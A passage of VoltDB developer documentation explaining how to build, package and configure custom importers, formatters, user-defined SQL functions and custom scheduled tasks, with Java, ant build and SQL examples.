</configuration>\n</export>\nAny properties listed in the <configuration> (\"filename\" in this example) are passed to the custom\nexport client as arguments to the configure() method, as described in Section 9.1.2, “How to Use Custom\nProperties to Configure the Client” . See the chapter on \" Importing and Exporting Live Data \" in the Using\nVoltDB manual for more information on configuring export connectors.\n9.2. Writing a Custom Importer\nAn import connector is a set of Java classes that configure the connector and then iteratively retrieve data\nfrom a remote source and pass it into VoltDB by invoking stored procedures. Unlike the export connector,\nwhich is responsible for formatting the data between source and target, the VoltDB import architecture\nallows for the use a separate formatter to translate the inbound data into a set of Java objects that can be\npassed as parameters to a stored procedure.\nImport connectors are packaged as OSGi (Open Service Gateway Initiative) bundles, so they can be started\nand stopped easily from within the server process. However, for the purposes of writing a custom importer,\nVoltDB handles much of the OSGi infrastructure in the abstract classes associated with the import client.\nAs a result, your import connector only needs to provide some of the classes normally required for an\nOSGi bundle. Specifically, a custom importer must provide the classes and methods described in Table 9.1,\n“Structure of the Custom Importer” .\nTable 9.1. Structure of the Custom Importer\nClass Method Description\nclass constructor\ngetFormatterBuilder() Returns the FormatterBuilder method of the\nspecified format.\ngetResourceID() Returns a unique resource ID for this im-\nporter instance.implementation of Im-\nporterConfig\nURI() Returns the URI for the current importer in-\nstance.\nextension of AbstractIm-\nporterFactorycreate() Returns an instance of the AbstractImporter\nimplementation.\n47Creating Custom Importers,\nExporters, and Formatters\nClass Method Description\ncreateImporterConfigura-\ntions()Returns a map of configuration information.\ngetTypeName() Returns the name of the AbstractImporter\nclass as a string.\nisImporterRunEverywhere() Returns true or false.\ngetName() Returns the name of the AbstractImporter\nclass as a string.\naccept() Performs the actual data import. Should\ncheck to see if stop() has been called.\nstop() Completes the import process.extension of AbstractIm-\nporter\nURI() Returns the URI for the current importer in-\nstance.\nHaving all the right parts in place is extremely important, since if the bundle is incomplete or incorrect,\nthe server process will crash when the importer starts. So the best way to create a new custom importer is\nto take an existing example — including the associated ant build script — and modify it as needed. You\ncan find an example custom importer in the VoltDB public github repository at the following URL:\nhttps://github.com/VoltDB/voltdb/tree/master/src/frontend/org/voltdb/importclient/socket\nThe following sections describe:\n•Writing the custom importer using Java\n•Compiling, packaging, and installing the importer\n•Configuring and running the importer\n9.2.1. Designing and Coding a Custom Importer\nOne of the most important decisions you must make when planning your custom importer is whether to\nrun a single importer process for the cluster or to design a run-everywhere importer. A single importer\nprocess ensures only one instance of the importer is running at any given time. That means on a cluster,\nonly one node will run the import connector process.\nThe following sections discuss run-everywhere vs. single process and managing the starting and stopping\nof the import connector.\n9.2.1.1. Run-Everywhere vs. Single Process\nA run-everywhere import connector starts a separate import process on each node in the cluster. A run-\neverywhere connector can improve performance since it distributes the work across the cluster. However,\nit means that the connector must negotiate the distribution of the work to avoid importing duplicate copies\nof the data.\nRun-everywhere connectors are especially useful where the import process uses a \"push\" model rather than\na \"pull'. That is, if the connector opens a port and accepts data sent to the port, then the data source(s) can\nproactively connect and \"push\" data to that port, making the data source responsible for the distribution\nto the multiple servers of the VoltDB cluster.\n48Creating Custom Importers,\nExporters, and Formatters\nYou specify whether you are creating a single importer process or run-everywhere connector in the isIm-\nporterRunEverywhere() method of the Importer class. If the method returns true, importer processes are\ncreated on every server. If the method returns false, only one importer process is created at any given time.\n9.2.1.2. Managing the Starting and Stopping of the Import Process\nWhen the custom importer is enabled, the ImporterFactory create() method is invoked, which in turn\ncreates instances of the ImporterConfig and Importer classes. The VoltDB import infrastructure then calls\nthe Importer accept() method for each importer process that is created.\nThe accept() method does the bulk of the work of iteratively fetching data from the appropriate sources,\ncalling the formatter to structure the content of each row, and invoking the appropriate stored procedure\nto insert the data into the database. Two important points to keep in mind:\n•If the accept() method fails for any reason of returns to the caller, the importer will stop until the next\ntime it is initialized. (That is, when the database restarts or is paused and resumed.)\n•On each iteration, the accept() method should check to see if the close() method has been called, so it\ncan clean up any pending imports and then return to the caller.\n9.2.2. Packaging and Installing a Custom Importer\nOnce the custom importer code is ready, you need to compile and package it as an OSGi-compliant JAR\nfile. There are a number of OSGi properties that need to be set in the JAR file manifest. So it is easiest\nto use an ant build file to compile and package the files. The following is an excerpt from an example\nbuild.xml file for a custom importer project:\n<!-- Simple build file to build socket stream importer -->\n<project name=\"customimport\" basedir=\".\" default=\"customimporter\">\n<property name='base.dir' location='.' />\n<property name='bundles.dir' location='./bundles' />\n<property name='build.dir' location='./obj' />\n <target name=\"buildbundle\" depends=\"customimporter\"/>\n <resources id=\"default.imports.resource\">\n <string>org.osgi.framework;version=&quot;[1.6,2)&quot;</string>\n <string>org.voltcore.network</string>\n <string>org.voltdb.importer</string>\n <string>org.voltdb.client</string>\n <string>org.voltdb.importer.formatter</string>\n <string>org.apache.log4j</string>\n <string>org.slf4j</string>\n <string>jsr166y</string>\n <string>org.voltcore.utils</string>\n <string>org.voltcore.logging</string>\n <string>com.google_voltpatches.common.base</string>\n <string>com.google_voltpatches.common.collect</string>\n <string>com.google_voltpatches.common.net</string>\n <string>com.google_voltpatches.common.io</string>\n <string>com.google_voltpatches.common.util.concurrent</string>\n </resources>\n <pathconvert property=\"default.imports\" \n refid=\"default.imports.resource\" pathsep=\",\"/>\n49Creating Custom Importers,\nExporters, and Formatters\n <target name=\"customimporter\">\n \n <!-- Compile source files -->\n [ . . . ]\n <!-- Build OSGi bundle -->\n <antcall target=\"osgibundle\">\n <param name=\"bundle.name\" value=\"mycustomimporter\"/>\n <param name=\"activator\" value=\"MyCustomImporterFactory\"/>\n <param name=\"bundle.displayname\" value=\"MyCustomImporter\"/>\n <param name=\"include.classpattern\" value=\"mycustomimporter/*.class\"/>\n </antcall>\n </target>\n <target name=\"osgibundle\">\n <mkdir dir=\"${bundles.dir}\" />\n <jar destfile=\"${bundles.dir}//${bundle.name}.jar\" basedir=\"${build.dir}\">\n <include name=\"${include.classpattern}\"/>\n <manifest>\n <attribute name=\"Bundle-Activator\" value=\"${activator}\" />\n <attribute name=\"Bundle-ManifestVersion\" value=\"2\" />\n <attribute name=\"Bundle-Name\" \n value=\"${bundle.displayname} OSGi Bundle\" />\n <attribute name=\"Bundle-SymbolicName\" \n value=\"${bundle.displayname}\" />\n <attribute name=\"Bundle-Version\" value=\"1.0.0\" />\n <attribute name=\"DynamicImport-Package\" value=\"*\" />\n <attribute name=\"Import-Package\" value=\"${default.imports}\" />\n </manifest>\n </jar>\n </target>\n</project>\nOnce you create the OSGi bundle, you install the custom importer by copying it to the bundles folder\ninside the root directory of the VoltDB installation on every server in the cluster. For example, if VoltDB\nis installed in /opt/voltdb , copy your custom importer JAR file to /opt/voltdb/bundles/ .\n9.2.3. Configuring and Running a Custom Importer\nOnce the custom importer is installed on the VoltDB servers, you can configure and start the importer\nusing the database configuration file. You can configure import either before the database starts or after\nthe database is running using the voltadmin update command.\nIn the configuration use the <import> and <configuration> elements to declare your custom im-\nporter. Specify the type as \"custom\" and identify the custom importer bundle in the module attribute\nspecifying the name of the JAR file. For example:\n<import>\n <configuration type=\"custom\" module=\"mycustomimporter.jar\" >\n [ . . . ]\nIf the custom importer requires additional information, you can provide it in properties passed to the Im-\nporterConfig class. For example:\n50Creating Custom Importers,\nExporters, and Formatters\n<import>\n <configuration type=\"custom\" module=\"mycustomimporter.jar\">\n <property name=\"datasource\">my.data.source</property>\n <property name=\"timeout\">5m</property>\n </configuration>\n</import>\nAs soon as the configuration is enabled, the import processes will be initialized and the custom importer\naccept() method invoked by the VoltDB import infrastructure.\n9.3. Writing a Custom Formatter\nA formatter is a module that takes a row of data received by an import connector, interprets the contents,\nand translates it into individual column values. The default formatter that is provided with VoltDB parses\ncomma-separated values (CSV) data. However, if the data you are importing is in a different format, you\ncan write a custom formatter to perform this translation step.\nYou provide a custom formatter as an OSGi (Open Service Gateway Initiative) bundle. However, much\nof the standard work of an OSGi bundle is handled by the VoltDB import framework. So you only need\nto provide selected components as described in the following sections.\nNote\nCustom formatters can be used with both custom and built-in import connectors and with the\nstandalone kafkaloader utility.\nThe following sections describe:\n•The structure of the custom formatter\n•Compiling and packaging custom formatter bundles\n•Installing and invoking custom formatters\n•Using custom formatters with the kafkaloader utility\n9.3.1. The Structure of the Custom Formatter\nThe custom formatter must contain at least two Java classes: one that implements the org.volt-\ndb.importer.formatter.Formatter interface and one that extends the org.voltdb.im-\nporter.formatter.AbstractFormatterFactory interface.\nFor the sake of example, let's assume the custom formatter classes are called MyFormatter and MyFor-\nmatterFactory. When the associated import connector is initialized, the VoltDB importer infrastructure\ncalls the classes' methods in the following order:\n•MyFormatterFactory.create () is called once, to initialize the formatter. The create method\nmust return an instance of the MyFormatter class.\n•MyFormatter.MyFormatter() is invoked once when an instance of the MyFormatter class is\ninitialized in the preceding step.\n•MyFormatter.transform () is called from the import connector every time it retrieves a record from the\ndata source.\n51Creating Custom Importers,\nExporters, and Formatters\nIn many cases, the easiest way to create custom class is to modify an existing example. And VoltDB\nprovides an example formatter that you can use as a base for your customizations in the VoltDB github\nat the following URL:\nhttps://github.com/VoltDB/voltdb/tree/master/tests/test_apps/kafkaimporter/custom_formatter/formatter\nThe next sections describe how to modify this example — or how to create a custom formatter from\nscratch, if you wish.\n9.3.1.1. The AbstractFormatterFactory Interface and Class\nYou must create a class that extends the AbstractFormatterFactory class. However, within that class all\nyou need to change is overriding the create() method to return an instance of your implementation of the\nFormatter interface. So, assuming the new class names use the prefix \"MyFormatter\" and using the example\nformatter provided in github, all you need to modify are the items highlighted in the following example:\npackage myformatter ;\nimport org.voltdb.importer.formatter.AbstractFormatterFactory;\npublic class MyFormatterFactory extends AbstractFormatterFactory {\n /**\n * Creates and returns the formatter object.\n */\n @Override\n public MyFormatter create() {\n MyFormatter formatter = new MyFormatter (m_formatName, m_formatProps);\n return formatter;\n }\n}\n9.3.1.2. The Formatter Interface and Class\nThe bulk of the work of a custom formatter occurs in the class that implements the Formatter interface.\nWithin that class, you must have at least one method that overrides the default transform() method.\nYou can, optionally, include a method that initializes the class and handles any properties that need to be\npassed into the formatter from the import configuration.\n9.3.1.2.1. Initializing the Formatter Class\nThe method that initializes the class has the same name as the class (in our example, MyFormatter). The\nmethod accepts two parameters: a string and a list of properties. The string contains the name of the for-\nmatter as specified in the database configuration file (see Section 9.3.3.2, “Configuring and Invoking Cus-\ntom Formatters” ). This string will, by definition, match the name of the class itself. The second parame-\nter is a collection of Java Property objects representing properties set in the configuration file using the\n<format-property> element and certain VoltDB built-in properties, whose names all start with two\nunderscores.\nIf the custom formatter doesn't require any information from the configuration, you do not need to include\nthis method. However, if your formatter does require additional information, this class can retrieve and\nstore information provided in the import configuration. For example, the MyFormatter() method in the\nfollowing implementation looks for a \"column_width\" property and stores it for later use by the trans-\nform() method:\n52Creating Custom Importers,\nExporters, and Formatters\npackage myformatter;\nimport java.util.Properties;\nimport org.voltdb.importer.formatter.FormatException;\nimport org.voltdb.importer.formatter.Formatter;\npublic class MyFormatter implements Formatter {\n String column_width = \"\";\n MyFormatter (String formatName, Properties prop) {\n column_width = prop.getProperty(\"column_width\");\n }\n9.3.1.2.2. Transforming the Data\nThe method that does the actual work of formatting the incoming data is the transform() method. This\nmethod receives the incoming data as a Java byte buffer and is expected to return an array of Java objects\nrepresenting the input parameters, which will be passed to the specified stored procedure to insert the data\ninto the database.\nFor example, If the custom formatter expects data in fixed-width columns, the method might look like this:\n@Override\npublic Object[] transform(ByteBuffer payload) throws FormatException {\n String buffer = new String(payload.array());\n ArrayList<Object> list = new ArrayList<Object>();\n int position = 0;\n while (position < buffer.length()) {\n int endpoint = Math.min(position+column_width, buffer.length());\n list.add(buffer.substring(position,endpoint));\n position += column_width;\n }\n return list.toArray();\n}\n9.3.2. Compiling and Packaging Custom Formatter Bundles\nOnce the custom formatter source code is complete, you are ready to compile and package the formatter\nas an OSGi bundle.\nWhen compiling the source code, be sure to include the VoltDB JAR files in the Java classpath. For exam-\nple, if VoltDB is installed in the folder /opt/voltdb , you will need to include /opt/voltdb/volt-\ndb/* and /opt/voltdb/lib/* in the classpath.\nYou will also need to include a number of OSGi-specific attributes in the final JAR file manifest. For\nexample, you must include the Bundle-Activator attribute pointing to the FormatterFactory class. To ensure\nall the necessary properties are set, it is easiest to use the ant utility and an ant build file. The following is\nan example build.xml file, with the items that you must modify highlighted in bold text:\n<project default=\"build\">\n <path id='project.classpath'>\n <!-- Replace this with the path to the VoltDB jars -->\n53Creating Custom Importers,\nExporters, and Formatters\n <fileset dir=' /opt/voltdb '>\n <include name='voltdb/*.jar' />\n <include name='lib/*.jar' />\n </fileset>\n </path>\n <target name=\"build\" depends=\"clean, dist, formatter\"/>\n <target name=\"clean\">\n <delete dir=\"obj\"/>\n <delete file=\" myformatter.jar \"/>\n </target>\n <target name=\"dist\">\n <mkdir dir=\"obj\"/>\n <javac srcdir=\"src\" destdir=\"obj\">\n <classpath refid=\"project.classpath\"/>\n </javac>\n </target>\n <target name=\"formatter\">\n <jar destfile=\"myformatter.jar\" basedir=\"obj\">\n <include name=\" myformatter/MyFormatter.clas s\"/>\n <include name=\" myformatter/MyFormatterFactory.class \"/>\n <manifest>\n <attribute name=\"Bundle-Activator\" \n value=\" myformatter.MyFormatterFactory \" />\n <attribute name=\"Bundle-ManifestVersion\" value=\" 2\" />\n <attribute name=\"Bundle-Name\" value=\" My Formatter OSGi Bundle \" />\n <attribute name=\"Bundle-SymbolicName\" value=\" MyFormatter \" />\n <attribute name=\"Bundle-Version\" value=\"1.0.0\" />\n <attribute name=\"DynamicImport-Package\" value=\"*\" />\n </manifest>\n </jar>\n </target>\n</project>\n9.3.3. Installing and Invoking Custom Formatters\nOnce you have built and packaged the custom formatter, you are ready to install and use it in your VoltDB\ninfrastructure.\n9.3.3.1. Installing Custom Formatters\nTo install the custom formatter, you simply copy the formatter JAR file (in the preceding examples, my-\nformatter.jar ) to the bundles folder in the VoltDB installation on every server in the cluster. For\nexample, if VoltDB is installed in /opt/voltdb :\n$ cp obj/myformatter.jar /opt/voltdb/bundles/\n9.3.3.2. Configuring and Invoking Custom Formatters\nOnce the JAR file is available to all VoltDB instances, you can configure and invoke the custom formatter\nas part of the import configuration. Note that the import configuration can be changed either before the\n54Creating Custom Importers,\nExporters, and Formatters\ndatabase cluster is started or while the database is running using either the voltadmin update command\nof the web-based VoltDB Management Center.\nYou choose the formatter as part of the import configuration using the format attribute of the <con-\nfiguration> element in the database configuration file. Normally, you use the built-in \"csv\" format.\nHowever, to select a custom formatter, set the format attribute to the name of the formatter JAR file\nand its class name. For example:\n<import>\n <configuration type=\"kafka\" format=\"myformatter.jar/MyFormatter\" >\n [ . . . ]\nStoring your custom JAR in the bundles directory is recommended. However, if you choose to keep your\ncustom code elsewhere, you can still reference it in the configuration by including the absolute path to the\nfile location as part of the format attribute. For example, if your JAR file is in the /etc/myapp folder,\nthe format attribute value would be \"file:/etc/myapp/myformatter.jar/MyFormatter\". The formatter JAR\nmust be in the same location on all nodes of the cluster.\nWithin the import configuration, you can also include any properties that the formatter needs using the\n<format-property> element. For example, in the preceding example, the custom formatter expects\na property called \"column_width\", so the configuration might look like this:\n<import>\n <configuration type=\"kafka\" format=\"myformatter.jar/MyFormatter\" >\n <property name=\"brokers\">kafka.myorg.org:9092</property>\n <property name=\"topics\">customer</property>\n <property name=\"procedure\">CUSTOMER.insert</property>\n <format-property name=\"column_width\">15</format-property>\n </configuration>\n<import>\n9.3.4. Using Custom Formatters With the kaaloader Utility\nYou can also use custom formatters with the standalone kafkaloader utility. To use a custom formatter\nwith kafkaloader you must:\n•Declare environment variables for FORMATTER_LIB and ZK_LIB\n•Create a formatter properties file specifying the formatter class and any formatter-specific properties\nthe formatter requires.\nThe environment variables define the paths to the formatter JAR file and the Apache ZooKeeper libraries,\nrespectively. (Note that ZooKeeper does not need to be running, but you must have a copy of the standard\nZooKeeper libraries installed and accessible via the ZK_LIB environment variable.)\nThe formatter properties file must contain, at a minimum, a \"formatter\" property that is assigned to the\nformatter class of the custom formatter. It can contain other properties required by the formatter. The\nfollowing is the properties file for kafkaloader that matches the example given in the previous section to\nconfigure the custom formatter using the built-in importer infrastructure:\nformatter=MyFormatter\ncolumn_width=15\nIf both your formatter and the ZooKeeper libraries are in a folder myformatter under your home di-\nrectory, along with the preceding properties file, you could start the kafkaloader utility with the following\ncommands to use the custom formatter:\n55Creating Custom Importers,\nExporters, and Formatters\n$ export FORMATTER_LIB=\"$HOME/myformatter/\"\n$ export ZKLIB=\"$HOME/myformatter/\"\n$ kafkaloader --formatter=$HOME/myformatter/formatter.config \\\n --topic=customer --zookeeper=kafkahost:2181\n56Chapter 10. Creang Custom SQL\nFuncons\nVoltDB provides many built-in functions for use in SQL statements that are described in an appendix to\nthe Using VoltDB manual. These built-in functions perform a variety of tasks, such as data conversion,\nstring matching, geometric calculations, and so on.\nThere are two types of SQL functions: scalar functions and aggregate functions. A scalar function takes\na set of arguments and produces a single result value. DATEADD() is an example of a scalar function\nthat takes a timestamp, a value, and a unit type such as MINUTE or HOUR, and produces a value that\nrepresents the addition of the specified units to the input timestamp. An aggregate functions takes multiple\nvalues — a table column or expression — as part of a query and produces a value that aggregates the results\nfrom all of the input. MAX() is an example of a built-in aggregate function that calculates the maximum\nvalue of all the inputs associated with the query's constraints.\nHowever, not all possible functions are built in and there may be cases where you have an application-spe-\ncific function that needs to be performed repeatedly. Rather than writing code to perform the operation as\npart of the application or within a stored procedure, VoltDB lets you create and declare your own functions\nthat can be invoked directly from within SQL queries and data manipulation statements just like built-\nin functions.\nJust as there are two types of built-in functions, you can create two types of user-defined functions. For\nuser-defined scalar functions, you write the function as a Java method that takes the specified input argu-\nments and returns a single value. User-defined aggregate functions are slightly more complex. You create\naggregate functions as a Java class with specific methods to initiate the function, collect and process the\ninput values, and return the aggregated result.\nIn both cases, there are the same three steps to creating a user-defined function :\n1.Write the code to perform the function as a Java method (for scalar functions) or a Java class (for\naggregate functions).\n2.Load the Java class that includes the user-defined function into the database.\n3.Declare the function using the CREATE FUNCTION or CREATE AGGREGATE FUNCTION state-\nment, associating it to the Java class and/or method.\nThe following sections describe how to perform each of these tasks, as well as how to invoke the function\nin SQL statements once it has been declared.\n10.1. Writing a User-Defined Scalar Function\nYou write user-defined scalar functions as Java methods. If you are creating multiple scalar functions, you\ncan put them all in a single Java class or in separate Java classes. Whichever is most convenient for you\nand the management of your code base.\nThe number and datatypes of the method's parameters define the number and types of the function's argu-\nments. For example, if you declare the method as having two parameters, a Java int and String, the\nfunction will have two arguments, a VoltDB INTEGER and a VARCHAR. Similarly, the return datatype\nof the method itself determines the datatype that the function returns.\nBecause user-defined functions are executable within SQL statements and stored procedures, the methods\nmust obey the same rules concerning determinism as stored procedures. That is, avoid any actions that in-\n57Creating Custom SQL Functions\ntroduce values that may vary from one system to another, such as system time, random number generation,\nor I/O with indeterminate results. See the section on determinism in the Using VoltDB manual for details.\nFor example, say you need to convert distances from imperial or US units to metric measurements. You\nmight define your function with two arguments: a floating-point value representing the measurement and a\nstring unit identifying the units (such as \"feet\", \"yards\", or \"miles\"). So your Java source code would need\nto declare the method as accepting two parameters: a double and a String. It should also be declared\nas returning a double value.\npackage myapp.sql.functions;\nimport org.voltdb.*;\npublic class Conversion {\n \n public double us2metric( double value, String units )\n throws VoltAbortException {\nNote the method is declared as throwing a VoltAbortException. This is useful for error handling. By\nthrowing a VoltAbortException, it is possible for the function to handle errors gracefully and notify the\nVoltDB runtime to rollback the current transaction. For example, the first step in the method might be to\nvalidate the input and make sure the units argument has a known value:\nunits = units.toUpperCase().trim();\nif (!units.equals(\"FEET\") && \n !units.equals(\"YARDS\") && \n !units.equals(\"MILES\") ) \n throw new VoltAbortException(\"Unrecognized selector.\");\nThe bulk of the method will focus on performing the actual task the function is designed for. The key point\nis to make sure it returns the appropriate datatype object that correlates to the VoltDB datatype you want\nthe function to return in the SQL statement. In the previous example, the method is declared as returning\na double, which matches the VoltDB FLOAT type. See the appendix on Datatype compatibility in the\nUsing VoltDB manual for details on the mapping of Java and VoltDB datatypes. But, in brief, the mapping\nof Java to VoltDB datatypes is as follows:\nbyte or Byte → TINYINT\nshort or Short → SMALLINT\nint or Integer → INTEGER\nlong or Long → BIGINT\ndouble or Double → FLOAT\nBigDecimal → DECIMAL\nString → VARCHAR\nbyte[] or Byte[] → VARBINARY\nYou can define parameters for VoltDB-specific datatypes by using the object types included in the VoltDB\nJava packages. For example:\norg.voltdb.types.GeographyValue → GEOGRAPHY\norg.voltdb.types.GeographyPointValue → GEOGRAPHY_POINT\norg.voltdb.types.TimestampType → TIMESTAMP\n10.2. Writing a User-Defined Aggregate Function\nAggregate functions are more complex than scalar functions because the program code does not receive\na predefined number of arguments, it must handle a variable number of rows. It must also be able to\n58Creating Custom SQL Functions\naggregate results from multiple partitions in the case of partitioned tables. To make this possible, user-\ndefined aggregate functions are written as a Java class with four required methods:\n•start() — This method initializes the function and is called once when the function is first invoked.\n•assemble( arg ) — This method processes the argument to the function and is called once for\neach record matching the constraints defined by the query.\n•combine( class-instance ) — For partitioned tables in a multi-partition procedure, this\nmethod combines the results of one partition into the results of another and is called iteratively until the\nresults from all of the partitions are aggregated.\n•end() — This method finalizes the function, returning the function result. It is called once after all\nof the input has been processed and, if appropriate, the partitions combined.\nLet's take a look at a simple example of an aggregate function to understand how this works. The MAX()\nbuilt-in function returns the maximum value from a set of inputs and CHAR_LENGTH() returns the length\nof a text string. So you can combine them to find the length of the longest string. But what if you want to\nknow what is the longest word in the set of strings? For this you need to write your own aggregate function.\nFirst, the function must import and implement the VoltUDAggregate interface. Within the class, the\ndatatype of the assemble method's parameter defines the type of the function's argument. For example,\nif you declare the method as having one String parameter, the function will accept one argument, a Volt-\nDB VARCHAR expression. Similarly, the datatype of the end method determines the datatype that the\nfunction returns. See the appendix on Datatype compatibility in the Using VoltDB manual for details on\nthe mapping of Java and VoltDB datatypes.\nSo the Java source code of a longest word function might look like the following:\npackage fadvisor.functions;\nimport java.io.Serializable;\nimport org.voltdb.VoltUDAggregate;\npublic class LongestWord \n implements Serializable, VoltUDAggregate<String, LongestWord> {\n private String longest;\n public void start() {\n /* Initialize value. */\n longest = \"\";\n }\n \n public void assemble (String txt) {\n /* Break into uppercase words, then check each word. */\n String[] words = txt.toUpperCase().split(\"\\\\W+\");\n for (int i=0;i<words.length;i++) {\n if (words[i].length() > longest.length()) {\n longest = words[i];\n } else {\n /* If the same length, alphabetize. */\n if ( words[i].length() == longest.length() & \n longest.compareTo(words[i]) > 0 ) {\n longest = words[i]; \n59Creating Custom SQL Functions\n }\n }\n \n }\n }\n \n public void combine(LongestWord other) {\n /* Merge the results from each partition. */\n if (other.longest.length() > longest.length()) {\n longest = other.longest;\n } else {\n if ( other.longest.length() == longest.length() & \n longest.compareTo(other.longest) > 0 ) {\n longest = other.longest;\n } \n }\n }\n \n public String end() {\n /* Return the result. */\n return longest;\n }\n}\nThe bulk of the assemble and combine methods perform the actual task the function is designed for.\nThe key point is to make sure the end method returns the appropriate datatype object that correlates to\nthe VoltDB datatype you want the function to return in the SQL statement. In this example, the method is\ndeclared as returning a String, matching the VoltDB VARCHAR type.\n10.3. Loading User-Defined Functions into the\nDatabase\nOnce you have written, compiled, and tested the Java code for your SQL functions, you can load them into\nthe database. You load user-defined functions the same way you load stored procedures, by packaging the\nJava class or classes into a JAR file and then loading the JAR file using the LOAD CLASSES statement.\nFor example:\n$ export CLASSPATH=\"$CLASSPATH:/opt/voltdb/voltdb/*\"\n$ javac -d ./obj src/myapp/functions/*.java\n$ jar cvf myfunctions.jar -C obj .\n$ sqlcmd\n1> load classes myfunctions.jar;\nYou can package multiple function methods and classes or a combination of functions and stored procedure\nclasses into a single JAR file. The key is that you must load the classes containing the aggregate functions\nand scalar function methods into the database before you can declare them as SQL functions.\n10.4. Declaring a User-Defined Function\nOnce the Java class containing the method is loaded, you can declare the function itself. You declare\nscalar functions using the CREATE FUNCTION statement, specifying the name of the function and the\n60Creating Custom SQL Functions\nassociated Java class path and method name. For example, if you want to call the function associated with\nthe scalar example US2METRIC, the CREATE FUNCTION statement looks like this:\nCREATE FUNCTION US2METRIC FROM METHOD myapp.functions.Conversion.us2metric;\nYou declare aggregate functions using the CREATE AGGREGATE FUNCTION statement, specifying\nthe name of the function and the associated Java class. For example, if you want to call the function\nassociated with the aggregate example LONGEST_WORD, the CREATE AGGREGATE FUNCTION\nstatement looks like this:\nCREATE AGGREGATE FUNCTION LONGEST_WORD FROM CLASS myapp.functions.LongestWord;\nNote that although the function names are not case sensitive, the class path and method names are and\nmust be specified in the correct mix of upper and lower-case.\n10.5. Invoking User-Defined Functions in SQL\nStatements\nOnce the class is loaded and the function declared, you can include the user-defined function in SQL\nqueries and data manipulation (DML) statements just as you normally use built-in functions in SQL. For\nexample, if a stored procedure needs to convert an entry in miles to the equivalent measurement in kilo-\nmeters, the stored procedure definition might look like the following:\nCREATE PROCEDURE Expense_in_miles AS\n INSERT INTO Expense_item (item_name, distance, destination)\n VALUES (?, US2METRIC(?,'MILES') , ?);\nSimilarly, if you want a procedure to find the longest word in each product description for a specific\ncategory, the stored procedure definition might look like this:\nCREATE PROCEDURE big_words AS\n SELECT product_name, longest_word(description) FROM products\n WHERE category=? GROUP BY product_name;\nNote that user-defined functions can be used in queries and DML but cannot be used in data definition\nstatements, such as CREATE statements that define indexes, tables, or views.\n61Chapter 11. Creang Custom Tasks\nYou can schedule common repetitive tasks using the CREATE TASK SQL statement. CREATE TASK\nlets you schedule any system or user-defined stored procedure to be run on a specified schedule. However,\nthere are times when you need the schedule, or the procedure itself, to be more responsive: adjusting to\nthe current state of the database or the results of the previous task runs. This is what custom tasks help\nyou accomplish.\nCustom tasks let you modify the characteristics of the task, including:\n•What procedure is executed by the task\n•The arguments to the task procedure\n•The time interval between executions of the task\nThe following sections describe how to design, develop and implement custom tasks.\n11.1. Overview of How Custom Tasks Work\nYou write custom tasks as Java classes implementing one of three interfaces, depending on what you want\nto customize:\n•ActionGenerator — Customizes the stored procedure to call and the parameters to use\n•IntervalGenerator — Customizes the interval between procedure calls\n•ActionScheduler — Customizes all three aspects of the task: the stored procedure to call, its parameters,\nand the interval between calls\nOnce you write the class for a custom task, you implement it in VoltDB in two steps:\n1.You load the class into the database the same way you would a stored procedure, by compiling and\npackaging it as a JAR file and then loading the JAR file into the database with the LOAD CLASSES\ndirective.\n2.You then declare the custom task using the CREATE TASK statement, replacing the argument to the\nappropriate clause with FROM CLASS. For example, a custom procedure call replaces PROCEDURE\n{procedure-name} with PROCEDURE FROM CLASS {class-name} , a custom interval re-\nplaces ON SCHEDULE {type-and-value} with ON SCHEDULE FROM CLASS {class-\nname}, and a custom scheduler replaces both the PROCEDURE and ON SCHEDULE clauses with\nFROM CLASS {class-name} . You can optionally specify arguments to the custom class using\nthe WITH clause.\nFor example, the following SQL statements declare one custom task of each type, assuming their classes\nare packaged in the JAR mytasks.jar :\nLOAD CLASSES mytasks.jar;\nCREATE TASK variableproc \n ON SCHEDULE EVERY 5 SECONDS\n PROCEDURE FROM CLASS MyVariableProc WITH (1,2,3) ;\nCREATE TASK variableinterval \n ON SCHEDULE FROM CLASS MyVariableInterval WITH (1,2,3)\n PROCEDURE cleanupchoir;\nCREATE TASK variabletask \n FROM CLASS MyVariableTask WITH (1,2,3) ;\n62Creating Custom Tasks\nIn all three cases, the sequence of events at run time is the same. Once you declare and enable a custom\ntask, the database:\n1.Invokes the custom task's initialize() method once, passing the parameters specified in the WITH\nclause of the CREATE TASK statement.\n2.Invokes the custom task's getFirst<item> () method once. The actual method name varies de-\npending on the interface; getFirstAction() for actions, getFirstInterval for intervals, and\ngetFirstScheduledAction() for both action and interval. The method must return an object\nwith the custom values and a callback method. VoltDB uses this information to schedule the first in-\nvocation of the task.\n3.Iteratively, invokes the specified callback method, passing the results of the stored procedure as an\nargument. The callback then repeats the process of returning an object with the next custom values\nand callback.\nThis sequence of events is repeated any time the database is restarted, the schema is changed, or the\ndatabase is paused and then resumed.\nThe following sections provide examples of using each type of customization. See the javadoc for addi-\ntional details about the classes and methods that can assist your task design.\n11.2. Modifying the Procedure Call and Arguments\nTo vary the stored procedure called by a task or the arguments to that procedure, you can create a custom\ntask that implements the ActionGenerator interface. The custom task consists of the Java class you create,\nand the SQL statements to load and declare the task. At run time, for each invocation of the task, VoltDB\nuses the custom class to determine what procedure to call and its arguments and the task declaration to\ndetermine when to run the task.\nLet's look at an example. Say we want a task that periodically deletes unused sessions. The stored procedure\nto do this might look like the following, where the batch size — the maximum number of records to delete\n— is passed in as an argument to the procedure:\nCREATE PROCEDURE PurgeOldSessions DIRECTED AS\n DELETE FROM session \n WHERE last_access < DATEADD(MINUTE,-5,NOW()) \n ORDER BY sessionID ASC LIMIT ?;\nWe could schedule this procedure using a static task and a fixed batch size. But then there is no guarantee\nthat the task can keep up with the volume of expired sessions. Instead, we would like to be able to adjust\nthe batch size to accommodate changing workloads.\nTo do this we can create a custom task that checks how many records were actually deleted in each run. If\nthe count of deleted records is less than 80% of the batch size, reduce the batch size for the next run. On the\nother hand, if the number deleted equals the batch size, increase the batch size incrementally until it matches\nthe workload. Finally, we can use parameters to the custom task to specify the minimum, maximum, and\nstarting batch size.\n11.2.1. Designing a Java Class That Implements Action-\nGenerator\nThe first step is to write a Java class that implements the ActionGenerator interface. This must be a static\nclass whose constructor takes no arguments. In our example, we will also declare class variables for a\n63Creating Custom Tasks\nhelper object that is used in subsequent methods plus minimum, maximum, and current values for the\nbatch size.\nThe class must, at a minimum, declare or override three methods:\ninitialize()\nThe initialize() method is called first and receives a helper object (inserted automatically by the task\nsubsystem), plus any parameters defined by the task definition in SQL. In our example there will be\nthree parameters from the task definition: a minimum, maximum, and starting value for the batch\nsize, which the method stores in the variables declared earlier. So the initialize() method ends up\nhaving a total of four arguments.\nGetFirstAction()\nThe getFirstAction() method is called when the task starts; 